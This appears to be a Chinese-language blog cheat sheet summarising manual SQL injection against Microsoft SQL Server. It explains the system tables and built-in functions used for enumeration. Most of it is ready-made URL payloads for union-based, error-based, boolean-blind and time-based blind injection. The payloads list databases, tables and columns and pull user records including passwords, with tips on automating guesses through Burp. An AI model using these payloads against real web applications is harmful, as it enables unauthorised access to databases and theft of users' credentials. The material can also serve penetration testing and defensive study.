mssql手工注入简单总结

2023-01-30 19:04:57

0x01 基础知识

master数据库

master数据库控制SQLserver的所有方面，这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行中的过程的信息。

sysdatabases表

该表保存在master数据库中，这个表中保存的是所有的库名,以及库的ID，和一些相关信息。（一般用来查询全部的数据库，master..sysdatabases）。

sysobjects表

mssql的每个数据库内都有此系统表，存放该数据库内所有表数据；

关键字段name,id,xtype；

当xtype='u'时，表示为用户建立的表。（一般用来查数据库用户自建表）

syscolumns表

mssql的每个数据库内都有此系统表，存放所有表的字段;

关键字段name,id;

通过确定id来确定字段在哪张表中。

information_schema数据库

该表是在SQL server2000及更高版本存在的，可以检索数据库中的对象的元数据，与MySQL中的有相同的功能，它是符合ISO标准的；

该数据库只记录每个自建库的数据，每个自建库对应一个information_schema；

该数据库不会出现在系统数据库中，也就是只能查自建库表数据，列数据；

infomation_schema.tables的关键字段：table_catalog（数据库名）、table_name(表名)

information_schema.columns的关键字段：table_catalog(数据库名）、table_name（表名）、column_name（列名）、data_type（数据类型）

常见内置函数

select host_name();
select currnet_user;
select db_name();				#返回当前数据库名
select @@version;
select subString('admin',1,1);
select char(97);
select ascii('a');
select count(*);				#返回查询的行数
select len('adb');
select isnull(db_name(),0);		# 判断查询是否带有NULL，有则替换
select cast(db_name() as int);  # CAST(a as type) 类型转换,转换失败会报错
select object_id('cms_admin');  # 根据表名返回数据库表名ID
select object_name(199305139);  # 根据ID返回数据库表名
select @@version for xml path;  # 将查询到的数据以xml形式返回（相当于mysql的group_concat（）聚合）
if (1=1) waitfor delay '0:0:2'  # 时间盲注语句，延迟2秒,if前不需要and

0x02 联合查询注入

使用类似于limit操作的top

查当前数据库

?id=1 union select 1,'2',(select db_name()),4

查当前数据库的表数量

?id=1 union select 1,'2','3',(select count(name) from sysobjects where xtype='u')

查当前数据库的表（可bp爆破）修改后面的top值

?id=1 union select 1,'2',(select top 1 name from sysobjects where xtype='u' and name not in (select top 0 name from sysobjects  where xtype='u')),4

查看当前数据库某表的列数量

?id=1 union select 1,'2','3',(select count(*) from syscolumns where id=object_id('ptest'))

查看当前数据库某表的列名

?id=1 union select 1,'2',(select top 1 name from syscolumns where id=object_id('ptest') and name not in (select top 0 name from syscolumns where id=object_id('ptest'))),4

查看当前数据库下某表有多少行

?id=1 union select 1,'2','3',(select  count(*) from ptest)

查看当前数据库下某表的值

?id=4 union select 1,'2',(select top 1 cmd from ptest),4

注意

可以使用类似mysql的group_concat()进行聚合：xml for path

该语句会返回一张xml

?id=1 union select 1,'2',(select name,',' from sysobjects where xtype='u' for xml path),4

0x03 报错盲注

利用弱类型进行报错

测试

?id=1+and+1='asd'

查询所有数据库

?id=1+and+1=(select+name+from+master..sysdatabases+for+xml+path)

查询某个数据库的表

?id=1+and+1=(select+name+from+test..sysobjects+where+xtype='u'+for+xml+path)

查询test数据库的users表的字段

?id=1+and+1=(select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path)

查询users表的数据

?id=1+and+1=(select+id,name,password,age+from+test..users+for+xml+path)

0x04 布尔盲注

测试

?id=1+and+1=1

查询当前数据库名长度

?id=1+and+len((select+db_name()))=10

查询当前数据库名(可手工,可放入bp爆破)

?id=1+and+substring((select+db_name()),1,1)=char(10)

查询当前数据库test下的所有表长度(可手工,可放入bp爆破)

?id=1+and+len((select+name+from+test..sysobjects+for+xml+path))=10

查询当前数据库test的表(可手工,可放入bp爆破)

?id=1+and+substring((select+name+from+test..sysobjects+for+xml+path),1,1)=char(10)

查询test数据库下的users表字段长度(可手工,可放入bp爆破)

?id=1+and+len((select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path))=10

查询test数据库下的users表字段(可手工,可放入bp爆破)

?id=1+and+substring((select+name+from+test..syscolumns+where+id=(select+id+from+test..sysobjects+where+name='users')+for+xml+path),1,1)=char(10)

查询users表数据长度(可手工,可放入bp爆破)

?id=1+and+len((select+id,name,password,age+from+test..users+for+xml+path))=1

查询user表数据(可手工,可放入bp爆破)

?id=1+and+substring((select+id,name,password,age+from+test..users+for+xml+path),1,1)=char(1)

0x05 时间盲注

使用 if () waitfor delay '0:0:2'

测试

?id=1+if(1=1)+waitfor+delay+'0:0:2'